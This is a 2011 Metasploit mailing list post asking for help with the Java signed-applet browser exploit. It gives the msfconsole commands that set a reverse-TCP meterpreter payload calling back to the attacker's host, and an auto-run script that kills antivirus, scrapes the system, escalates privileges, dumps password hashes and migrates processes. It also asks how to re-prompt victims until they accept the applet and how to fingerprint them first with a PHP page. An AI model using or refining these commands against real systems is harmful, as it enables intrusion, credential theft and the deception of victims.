Metasploit mailing list archives

Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts.


From: Richard Miles <richard.k.miles () googlemail com>
Date: Sun, 19 Jun 2011 11:26:39 -0500

No one can help me?

Thanks

On Thu, Jun 16, 2011 at 4:18 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:
Hi

1) I want to test the Java Signed Applet. I'm using metasploit version
v3.8.0-dev and following this tutorial:

https://community.rapid7.com/community/metasploit/blog/2011/05/26/recent-developments-in-java-signed-applets

It works; however, I still get it with a bad digital signature. Below is
how I'm executing it:

use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set AutoRunScript multiscript -s /root/script.rc
set LHOST MyIP
set APPLETNAME CompanyName
set CERTCN Santo CompanyName
set SRVPORT 80
set ExitOnSession false
exploit -j -z

And it works, but I always see it in the browser as unsigned (bad
digital signature). What am I doing wrong?

b) Also, in my script.rc I have:

screenshot
sysinfo
getuid
run killav
run scraper
run getprivs
getprivs
run hashdump
dir c:\
ps
migrate
migrate -f
screenshot

But on the output of msfconsole I just see:


meterpreter > run multi_console_command -s /root/dump.rc
[*] Running Command List ...
meterpreter >

And I never see the output.

I basically just want to do the following once a connection with
meterpreter is established.

- get a screenshot
- get sysinfo and getuid
- run killav and scraper
- launch getpriv
- execute hashdump
- execute "dir c:\" and "ps".
- call migrate -f (create a notepad and migrate to it)
- sleep 45 seconds and get another screenshot.

Can someone help me with how to do it? I want to see all output on the
msfconsole or save it locally on the msfconsole machine. How?

C) Is there a way to tell metasploit to reload the Java Signed Applet
exploit until the user clicks "yes"?

D) I would love to have a .php script doing basic enumeration of my
target before executing the Java Signed Applet. Is there a way to launch
this exploit in Apache, or any other way that I can first execute a
.php script and then redirect to the Java Signed Applet exploit?

Thanks a lot.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

